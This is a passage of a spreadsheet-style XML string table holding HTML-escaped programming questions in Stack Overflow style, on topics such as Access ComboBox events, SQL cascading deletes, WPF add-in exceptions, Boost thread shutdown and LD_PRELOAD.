    <t xml:space="preserve">&lt;p&gt;I have a form whose controls I want to enable/disable depending on the values in a ComboBox control.  This ComboBox control is linked, like all the other controls in the form, to a table.  Inside the ComboBox's Change event, I placed the code that enables/disables the other controls.&lt;/p&gt;
&lt;p&gt;The problem I have is that when I open the form, the controls are not enabled/disabled.  I have to re-choose the ComboBox value to make all other controls enable or disable.&lt;/p&gt;
&lt;p&gt;One thing I noticed is that the RecordSet control inside the ComboBox often does not change to the value shown in the value property of the ComboBox.&lt;/p&gt;
&lt;p&gt;I tried using &lt;br&gt;
&lt;code&gt;combobox.recordset.filter = "Key = " &amp;amp; combobox.value&lt;/code&gt;&lt;br&gt;
 but I get the error &lt;br&gt;
&lt;code&gt;Operation is not supported for this type of object.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;Update&lt;/h2&gt;
&lt;p&gt;I think my problem has to do more in how I'm accessing the values in the combobox.recordset.  I was under the impression that combobox.recordset held the value received from the table.  But, it seems to hold the first record from the recordsource.&lt;/p&gt;
&lt;p&gt;I'm guessing that I will need to search those values I need by using another recordset object.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Signing a desktop application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to know how to have a desktop application signed as a product from my company. I'm not sure of the details.I think the process is I have to purchase a certificate from a company like verisign
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Searching for the best PHP nested sets class (PEAR class excluded)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a PHP (with MYSQL) nested sets class with all needed functions.
For example:&lt;/p&gt;
&lt;p&gt;createLeftNode, createRightNode,createRootNode, createSubNode,deleteNode and &lt;strong&gt;moveTree&lt;/strong&gt;.  Not only 1 left, 1 right, 1 up and 1 down but also a part of a tree in a nother tree.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Shadow Copying, and mixed C# and C++ DLLs loading from arbitrary folders</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a VS 2005 C# project that uses a special Plugin folder to load extra DLLs (for use as nodes in an asset conversion process).&lt;/p&gt;
&lt;p&gt;I have a mixture of C# and C++ DLLs in this folder.&lt;/p&gt;
&lt;p&gt;The issue I have is that when Shadow Copying is enabled, the C++ DLLs refuse to load using Assembly.LoadFrom. I have attempted to create a custom app domain, and used Load, but this also failed.&lt;/p&gt;
&lt;p&gt;Finally, I tried reading the DLL in as byte[] data and using Load on that - again, only the C# DLLs would work this way, with an error "Additional information: Unverifiable code failed policy check. (Exception from HRESULT: 0x80131402)".&lt;/p&gt;
&lt;p&gt;An article on the net prompted me to attempt to use /clr:safe when building that particular DLL, but then it simply failed to build due to thousands of errors in Microsoft code... (apparently)&lt;/p&gt;
&lt;p&gt;With Shadow Copying disabled, LoadFrom works fine for all DLLs. The app is itself a plugin for Maya, and this used to work with Maya 8.5 but fails with 2008 / 2009 (if Shadow Copying is enabled).&lt;/p&gt;
&lt;p&gt;We really would prefer to use Shadow Copying, because it prevents DLL file locks when the app is running (the Plugins folder is stored in a location that Perforce can update while the app is running).&lt;/p&gt;
&lt;p&gt;Any ideas as to how I can persuade Shadow Copying to work with a custom folder AND a mix of C# / C++ DLLs without these problems?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to put BIDS solutions under source control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am starting to work with Microsoft BI suite: Analysis services 2005, Business Intelligence Development Studio 2005, stuff like that. Of course my first wish was to set up the same source control/automated testing environment I have for my .NET projects.   &lt;/p&gt;
&lt;p&gt;But xml files used by Analysiss services (dwproj, cube, dim, ds, dsv) and Integration services (dtsx) are rather source control-unfriendly. Not only they have actual data intermingled with presentation details of e.g. diagram coordinates, but they are also often reformatted on save by Visual Studio. This results in completely useless diffs in TortoiseSVN, where half of the file has changed but you cannot understand where and why.  &lt;/p&gt;
&lt;p&gt;How do you solve this problem? Are there any specilized systems/plugins suitable for the job?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL: Complex Deletion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I basically created some tables to play around with:  I have Two main tables, and a Many-Many join table.  Here is the DDL:  (I am using HSQLDB)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE PERSON
(
    PERSON_ID INTEGER GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY, 
    NAME VARCHAR(50), MAIN_PERSON_ID INTEGER
)
CREATE TABLE JOB
(
    JOB_ID INTEGER GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY, 
    NAME VARCHAR(50)
)
CREATE TABLE JOB_PERSON
(
    PERSON_ID INTEGER, 
    JOB_ID INTEGER
)
ALTER TABLE JOB_PERSON ADD 
    CONSTRAINT FK_PERSON_JOB FOREIGN KEY(PERSON_ID) 
    REFERENCES PERSON ON DELETE CASCADE ON UPDATE CASCADE 
ALTER TABLE JOB_PERSON ADD
    CONSTRAINT FK_JOB_PERSON FOREIGN KEY(JOB_ID) 
    REFERENCES JOB ON DELETE CASCADE ON UPDATE CASCADE
ALTER TABLE PERSON ADD
    CONSTRAINT FK_PERSON_PERSON FOREIGN KEY(MAIN_PERSON_ID) 
    REFERENCES PERSON ON DELETE CASCADE ON UPDATE CASCADE
insert into person values(null,'Arthur', null);
insert into person values(null,'James',0);
insert into job values(null, 'Programmer')
insert into job values(null, 'Manager')
insert into job_person values(0,0);
insert into job_person values(0,1);
insert into job_person values(1,1);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to create a delete statement that deletes orphans from JOB (if there exists only one entry in the join table for a specific job) based on the PERSON.PERSON_ID.  &lt;/p&gt;
&lt;p&gt;In pseudo language:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;delete from job where job_person.job_id=job.job_id 
AND count(job_person.job_id)=1 AND job_person.person_id=X
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where X is some person_id.  I have tried a lot of different ways; I think it is the "COUNT" part that is causing problems.  I am an SQL rookie, so any help would be much appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Statement indentation good practice</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the accepted practice for indenting SQL statements?  For example, consider the following SQL statement:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT column1, column2
FROM table1
WHERE column3 IN
(
SELECT TOP(1) column4
FROM table2
INNER JOIN table3
ON table2.column1 = table3.column1
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How should this be indented?  Many thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How might I update this code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;   &amp;lt;object height="25" width="75" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"&amp;gt;
    	&amp;lt;param value="http://click-here-to-listen.com/players/iaPlay13.swf?x=1058286910FTRZGK" name="movie"/&amp;gt; 
    	&amp;lt;param value="high" name="quality"/&amp;gt;
    	&amp;lt;param value="#FFFFFF" name="bgcolor"/&amp;gt; 
    	&amp;lt;param value="opaque" name="wmode"/&amp;gt;
    	&amp;lt;embed height="25" width="75" wmode="opaque" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" bgcolor="#FFFFFF" quality="high" src="http://click-here-to-listen.com/players/iaPlay13.swf?x=1058286910FTRZGK"/&amp;gt;
    &amp;lt;/object&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am having to insert this legacy markup into a new site that I'm building. Problem is its using an &lt;code&gt;&amp;lt;embed&amp;gt;&lt;/code&gt; tag. &lt;/p&gt;
&lt;p&gt;Would I just do away with the &lt;code&gt;&amp;lt;embed&amp;gt;&lt;/code&gt; and put some content in as an alternative, for those that do not have flash? Basically I'm just trying to bring this piece of html into the 21st century.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XMPP Server-to-Server for Gmail.com/Jabber.org</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm in the phase of implementing the server-to-server communication part of a XMPP Server.&lt;/p&gt;
&lt;p&gt;I'm testing my implementation with Gmail.com and Jabber.org but both seem to use the dialback protocol. Does anyone know more information about this protocol related to this servers?&lt;/p&gt;
&lt;p&gt;The protocol seems to be separated in several federation types, and can't seem to find the one this servers use, and the implications of this (root certificate, self-signed certificate, ...).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does opacity:0 have exactly the same effect as visibility:hidden</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If so, does it effectively deprecate the &lt;code&gt;visibility&lt;/code&gt; property?&lt;/p&gt;
&lt;p&gt;(I realize that Internet Explorer does not yet support this CSS2 property.)
&lt;br/&gt;
&lt;a href="http://en.wikipedia.org/wiki/Comparison_of_layout_engines_(CSS)#Properties"&gt;Comparisons of layout engines&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/133051/what-is-the-difference-between-visibilityhidden-and-displaynone"&gt;See also: What is the difference between visibility:hidden and display:none&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add button to other apps window title bar (XP/Vista)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the handler of an open window which wasn't necessarily open by my process. How can I add a button to that window and make the button call a certain application (.exe) when clicked? The button could be next to the system menu or the minimize button. This should work for both XP and Vista (a different approach for each version is OK).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best static analysis tool for NetBeans 6.1?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm finding a couple for Java in general but no plugins for netbeans that I can see.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NullReferenceException when hosting WPF in a System.AddIn</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are developing a WPF application that uses the System.AddIn framework to host add-ins that display additional WPF content.  Everything seems to be working fine, but overnight, the application threw the following NullReferenceException:&lt;/p&gt;
&lt;pre&gt;
Message: Error : Object reference not set to an instance of an object.
StackTrace :   at System.Windows.Interop.HwndSource.CriticalTranslateAccelerator(MSG&amp; msg, ModifierKeys modifiers)
   at System.AddIn.Pipeline.AddInHwndSourceWrapper.TranslateAccelerator(MSG msg, ModifierKeys modifiers)
   at MS.Internal.Controls.AddInHost.System.Windows.Interop.IKeyboardInputSink.TranslateAccelerator(MSG&amp; msg, ModifierKeys modifiers)
   at System.Windows.Interop.HwndHost.OnKeyUp(KeyEventArgs e)
   at System.Windows.UIElement.OnKeyUpThunk(Object sender, KeyEventArgs e)
   at System.Windows.Input.KeyEventArgs.InvokeEventHandler(Delegate genericHandler, Object genericTarget)
   at System.Windows.RoutedEventArgs.InvokeHandler(Delegate handler, Object target)
   at System.Windows.RoutedEventHandlerInfo.InvokeHandler(Object target, RoutedEventArgs routedEventArgs)
   at System.Windows.EventRoute.InvokeHandlersImpl(Object source, RoutedEventArgs args, Boolean reRaised)
   at System.Windows.UIElement.RaiseEventImpl(RoutedEventArgs args)
   at System.Windows.UIElement.RaiseEvent(RoutedEventArgs args, Boolean trusted)
   at System.Windows.Input.InputManager.ProcessStagingArea()
   at System.Windows.Input.InputManager.ProcessInput(InputEventArgs input)
   at System.Windows.Input.InputProviderSite.ReportInput(InputReport inputReport)
   at System.Windows.Interop.HwndKeyboardInputProvider.ReportInput(IntPtr hwnd, InputMode mode, Int32 timestamp, RawKeyboardActions actions, Int32 scanCode, Boolean isExtendedKey, Boolean isSystemKey, Int32 virtualKey)
   at System.Windows.Interop.HwndKeyboardInputProvider.ProcessKeyAction(MSG&amp; msg, Boolean&amp; handled)
   at System.Windows.Interop.HwndSource.CriticalTranslateAccelerator(MSG&amp; msg, ModifierKeys modifiers)
   at System.Windows.Interop.HwndSource.OnPreprocessMessage(Object param)
   at System.Windows.Threading.ExceptionWrapper.InternalRealCall(Delegate callback, Object args, Boolean isSingleParameter)
   at System.Windows.Threading.ExceptionWrapper.TryCatchWhen(Object source, Delegate callback, Object args, Boolean isSingleParameter, Delegate catchHandler)
   at System.Windows.Threading.Dispatcher.InvokeImpl(DispatcherPriority priority, TimeSpan timeout, Delegate method, Object args, Boolean isSingleParameter)
   at System.Windows.Threading.Dispatcher.Invoke(DispatcherPriority priority, Delegate method, Object arg)
   at System.Windows.Interop.HwndSource.OnPreprocessMessageThunk(MSG&amp; msg, Boolean&amp; handled)
   at System.Windows.Interop.HwndSource.WeakEventPreprocessMessage.OnPreprocessMessage(MSG&amp; msg, Boolean&amp; handled)
   at System.Windows.Interop.ThreadMessageEventHandler.Invoke(MSG&amp; msg, Boolean&amp; handled)
   at System.Windows.Interop.ComponentDispatcherThread.RaiseThreadMessage(MSG&amp; msg)
   at System.Windows.Threading.Dispatcher.PushFrameImpl(DispatcherFrame frame)
   at System.Windows.Threading.Dispatcher.PushFrame(DispatcherFrame frame)
   at System.Windows.Threading.Dispatcher.Run()
   at System.Windows.Application.RunInternal(Window window)
   at System.Windows.Application.Run(Window window)
   at System.Windows.Application.Run()
&lt;/pre&gt;
&lt;p&gt;As you can see, none of our code is in the stack trace, so I have no place to fix anything.  Anybody have any ideas about possible workarounds?&lt;/p&gt;
&lt;p&gt;Thanks for the help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WCF javascript proxy not found when endpoint address is not blank</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to setup a WCF service with multiple endpoints with one of the endpoints using the enableWebScript endpoint behavior so that a Javascript proxy will be created on the client (jsdebug/js).&lt;/p&gt;
&lt;p&gt;When adding the Service Reference to my AJAX ScriptManager, the jsdebug file is not found unless the address of the endpoint is blank. The ScriptManager proxy seems to always generate a path of "MyService.svc/jsdebug" to look for the file even though my service has an address of "ajax". The proxy should generate the path as "MyService.svc/ajax/jsdebug".&lt;/p&gt;
&lt;p&gt;Is there a setting to get the Proxy generated with the right path? My service is at the root of my website.&lt;/p&gt;
&lt;p&gt;works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;endpoint address="" 
  behaviorConfiguration="ajaxBehavior" 
  binding="webHttpBinding" 
  bindingConfiguration="webBinding" 
  contract="MyTest.Web.ICustomerService" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;want this (doesn't work):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;endpoint address="ajax" 
  behaviorConfiguration="ajaxBehavior" 
  binding="webHttpBinding" 
  bindingConfiguration="webBinding" 
  contract="MyTest.Web.ICustomerService" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to move documents from SharePoint 2003 to SharePoint 2007 with versioning?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm desperately searching for a tool allowing me to copy documents with their old versions from a SharePoint 2003 to a SharePoint 2007 site.&lt;br /&gt;
Do you know about any simple (and preferably free) tool which does this?&lt;br /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do I have to learn Objective-C for professional Mac Development?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do I really have to learn Objective-C to develop solid Mac Apps?&lt;/p&gt;
&lt;p&gt;As Mac users tend to use only applications that have a nice (native) GUI, i don't think that Mono and GTK+ or any Java GUI (Swing) will fit their needs.&lt;/p&gt;
&lt;p&gt;There are projects like Cocoa#, PyObjC and RubyCocoa, but are they ready for primetime?&lt;/p&gt;
&lt;p&gt;So do I really have to learn Objective-C ? 
I would prefer a dynamic language.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server Profiler - How to filter trace to only display events from one database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I limit a SQL Server Profiler trace to a specific database? I can't see how to filter the trace to not see events for all databases on the instance I connect to.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Kill a blocked Boost::Thread</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing an application which blocks on input from two &lt;code&gt;istreams&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Reading from either &lt;code&gt;istream&lt;/code&gt; is a synchronous (blocking) call, so, I decided to create two &lt;code&gt;Boost::thread&lt;/code&gt;s to do the reading.&lt;/p&gt;
&lt;p&gt;Either one of these threads can get to the "end" (based on some input received), and once the "end" is reached, both input streams stop receiving.  Unfortunately, I cannot know which will do so.&lt;/p&gt;
&lt;p&gt;Thus, I cannot &lt;code&gt;join()&lt;/code&gt; on both threads, because only one thread (cannot be predetermined which one) will actually return (unblock).&lt;/p&gt;
&lt;p&gt;I must somehow force the other to exit, but it is blocked waiting for input, so it cannot itself decide it is time to return (condition variables or what not).&lt;/p&gt;
&lt;p&gt;Is their a way to either:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Send a signal a boost::thread, or&lt;/li&gt;
&lt;li&gt;Force an &lt;code&gt;istream&lt;/code&gt; to "fail", or&lt;/li&gt;
&lt;li&gt;Kill a Boost::thread?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;One of the &lt;code&gt;istreams&lt;/code&gt; is &lt;code&gt;cin&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;I am trying to restart the process, so I cannot close the input streams in a way that prohibits reseting them.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I do know when the "end" is reached, and I do know which thread has successfully finished, and which needs to be killed.  Its the killing I need to figure out (or a different strategy for reading from an istream).&lt;/li&gt;
&lt;li&gt;I need both threads to exit and cleanup properly :(&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Migrating content from OpenWiki to ScrewTurn Wiki</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a large OpenWiki powered wiki. OpenWiki appears to be a dead project, and ScrewTurn the next best option.&lt;/p&gt;
&lt;p&gt;Is anyone aware of a data migration route to move our content from the OpenWiki SQL Server format to the ScrewTurn wiki SQL Server format?&lt;/p&gt;
&lt;p&gt;We may end up creating our own (and sharing it) but we'd rather not re-invent the wheel.&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Mike&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does the brand name matter for a SSL EV certificate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do end users really care if a SSL EV certificate is from VeriSign, Thwate, DigiCert, or etc.? A certificate from VeriSign can cost up to 3x the cost from DigiCert for the same basic features. VeriSign is probably the most recognizable brand name though.&lt;/p&gt;
&lt;p&gt;I've had many discussions with people about this topic, but I've never seen any real data (from studies, surveys, etc.) to support the idea that end users will feel more secure using your site when they see the VeriSign seal vs. the DigiCert seal.&lt;/p&gt;
&lt;p&gt;Does anyone have any real data to back up this idea?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Undefined reference to static class member</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone explain why following code won't compile? At least on g++ 4.2.4.&lt;/p&gt;
&lt;p&gt;And more interesting, why it will compile when I cast MEMBER to int?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;vector&amp;gt;
class Foo {  
public:  
    static const int MEMBER = 1;  
};
int main(){  
    vector&amp;lt;int&amp;gt; v;  
    v.push_back( Foo::MEMBER );       // undefined reference to `Foo::MEMBER'
    v.push_back( (int) Foo::MEMBER ); // OK  
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>In Java when does a URL connection close?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When does java let go of a connections to a URL? I don't see a close() method on either URL or URLConnection so does it free up the connection as soon as the request finishes? I'm mainly asking to see if I need to do any clean up in an exception handler.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;try {
  URL url = new URL("http://foo.bar");
  URLConnection conn = url.openConnection();
  // use the connection
}
catch (Exception e) {
  // any clean up here?
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What's "in" and "out" of OpenGL-ES? (Porting from OpenGL)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It seems that all of the documentation I can find about OpenGL-ES says something to the effect of "OpenGL-ES is just like OpenGL, but without a lot of stuff.  For example, there's no glBegin or glEnd."&lt;/p&gt;
&lt;p&gt;Ok, that's great.  So, what ELSE isn't there any of?  Or is there a list of what's &lt;em&gt;in&lt;/em&gt;?  Or maybe a porting guide?&lt;/p&gt;
&lt;p&gt;(Specifically, I'm trying to move an existing GL app to the iPhone, although I don't want to necessarily limit my Q to the iPhone.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Testing Web Services Consumer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here are some tools that I have found to test web services consumers:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.soapui.org/" rel="nofollow"&gt;http://www.soapui.org/&lt;/a&gt;
https://wsunit.dev.java.net/&lt;/p&gt;
&lt;p&gt;Are there any others? I would prefer testing frameworks that are written in Java or Python.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UPS Worldship Integration and .net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any UPS WorldShip integration APIS or Libraries out there for .net? I've been tasked with integrating our Sample Order application (A VB.Net/SQL Server app) with UPS, and having it write .xml files for the auto import feature though serialization has gotten my foot in the door- but some of the more advanced shipment options such as international customs options are completely undocumented. &lt;/p&gt;
&lt;p&gt;How did you get UPS integration up and running? Did you have any 3rd party help doing it? Is there a better location for documentation I'm just missing?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: What I'm trying to do is create new shipments based on order data in my database and then update those orders with the tracking number the shipment received from UPS. The orders have the shipping method designated, 2nd Day Air, Ground, or International. About 50% of the orders are international. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>WPF TreeView Binding</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a class with Parent and Children properties.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img148.imageshack.us/img148/6802/edmxxe8.gif" alt="ADO.NET Entity Framework Hierarchical Page Class" /&gt;&lt;/p&gt;
&lt;p&gt;I want to display this hierarchy in a WPF treeview.&lt;/p&gt;
&lt;p&gt;Here's my XAML...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;TreeView Margin="12" Name="TreeViewPages" ItemsSource="{Binding}"&amp;gt;
    &amp;lt;TreeView.Resources&amp;gt;
        &amp;lt;HierarchicalDataTemplate DataType="{x:Type Page}" ItemsSource="{Binding Children}"&amp;gt;
            &amp;lt;TextBlock Text="{Binding Path=ShortTitle}" /&amp;gt;
        &amp;lt;/HierarchicalDataTemplate&amp;gt;
    &amp;lt;/TreeView.Resources&amp;gt;
&amp;lt;/TreeView&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And my VB code...&lt;/p&gt;
&lt;pre&gt;
Dim db As New PageEntities
Dim t = From p In db.Page.Include("Children") _
        Where p.Parent Is Nothing _
        Select p
TreeViewPages.ItemsSource = t
&lt;/pre&gt;
&lt;p&gt;But I get a tree with one, non-templated item:&lt;/p&gt;
&lt;pre&gt;
PageManager.Page
&lt;/pre&gt;
&lt;p&gt;What do I need to do to get this working?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Help with using LD_PRELOAD</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create a library with a modified version of printf and then call LD_PRELOAD so when my program calls printf it uses my version. Can someone explain to me how to use LD_PRELOAD and if there is a something special I need to do in my code or my library? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone and HTML5 Cache Manifest</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to build an iPhone web application using ASP.NET.  The page is dynamically rendered once for each visitor. At this point the page can be bookmarked and it will never change again for that visitor. For this reason it should be cached locally from that point on so the application will run if referenced from the bookmark even if no network connection is available.  No matter what I try the phone continues to request the page from the server forcing a re-render or it fails if the phone is offline.  &lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/users/30506/louis-gerbarg"&gt;Louis Gerbarg&lt;/a&gt; suggested in &lt;a href="http://stackoverflow.com/questions/264367/iphone-web-app-cache-persistence"&gt;this&lt;/a&gt; post that I use HTML5 Cache Manifest to get this working however following the &lt;a href="http://www.w3.org/TR/offline-webapps/#offline" rel="nofollow"&gt;w3.org docs&lt;/a&gt; does not appear to work for the iPhone.  Does anyone have a good example where application cache is working?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sharepoint: Is it possible to make subgroups in top navigation menu?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to make subgroups in the top navigation menu, like: &lt;/p&gt;
&lt;p&gt;Home
-Group
--Subgroup&lt;/p&gt;
&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Is it possible? I can not make more than two levels!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How many dimensions in my array or get the last one</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I find out the number of dimensions in an array in Classic ASP ( VBScript ) .&lt;/p&gt;
&lt;p&gt;I am being passed an Array with multiple dimensions but I only want to look at the last. Seems easy in other languages.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone: Detecting user inactivity/idle time since last screen touch</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anybody implemented a feature where if the user has not touched the screen for a certain time period, you take a certain action? I'm trying to figure out the best way to do that.&lt;/p&gt;
&lt;p&gt;There's this somewhat-related method in UIApplication:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[UIApplication sharedApplication].idleTimerDisabled;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It'd be nice if you instead had something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NSTimeInterval timeElapsed = [UIApplication sharedApplication].idleTimeElapsed;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I could set up a timer and periodically check this value, and take some action when it exceeds a threshold.&lt;/p&gt;
&lt;p&gt;Hopefully that explains what I'm looking for. Has anyone tackled this issue already, or have any thoughts on how you would do it? Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Designing a Wiki, design considerations and feedback</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When designing a wiki application, what things should I take into consideration?&lt;/p&gt;
&lt;p&gt;So far I have:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;revisions&lt;/li&gt;
&lt;li&gt;parsing some sort of markup text&lt;/li&gt;
&lt;li&gt;keeping track of links in wikis, and pages that link to other pages.&lt;/li&gt;
&lt;li&gt;related wikis i.e. wikis are related to others.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;What else goes into building a Wiki?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java image library to deskew and crop images</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody have a suggestion for a java library that performs automatic cropping and deskewing of images (like those retrieved from a flatbed scanner)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Decoding a PRF file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to decode a PICS Rules File?
Contains settings and preferences used by the Windows operating system.&lt;/p&gt;
&lt;p&gt;The file is given by:&lt;/p&gt;
&lt;p&gt;Q:F]9y3n5|dp:n4hU)qbs;!&amp;amp;-bzh&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# 4.0 Feedback</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know the official method for submitting feedback on C# 4.0 so that Anders and his team will get the feedback and be able to respond to the submission?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>If I use explicit constructor, do I need to put the keyword in both .h and .cpp files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Actually my question is all in the title.&lt;br&gt;
Anyway:&lt;br&gt;
I have a class and I use explicit constructor:
&lt;br&gt;.h&lt;br&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class MyClass
{
  public:
    explicit MyClass(const string&amp;amp; s): query(s) {}
  private:
   string query;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is it obligatory or not to put &lt;b&gt;explicit&lt;/b&gt; keyword in implementation(.cpp) file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>designing a distributed (over many servers) error logging feature, WCF or?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am designing a error logging feature so our servers (each donig different things) can have a central data store for logging errors.&lt;/p&gt;
&lt;p&gt;Would it be a good idea to have the various applications writing to the error log file using a WCF service, or is that a bad idea?&lt;/p&gt;
&lt;p&gt;they &lt;em&gt;can&lt;/em&gt; do it just by ADO.NET to the database, which I think is the simpler route.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Singleton Destructors</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Should Singleton objects that don't use instance/reference counters be considered memory leaks in C++?&lt;/p&gt;
&lt;p&gt;Without a counter that calls for explicit deletion of the singleton instance when the count is zero, how does the object get deleted?  Is it cleaned up by the OS when the application is terminated?  What if that Singleton had allocated memory on the heap?&lt;/p&gt;
&lt;p&gt;In a nutshell, do I have to call a Singelton's destructor or can I rely on it getting cleaned up when the application terminates?&lt;/p&gt;
</t>
  </si>
  <si>
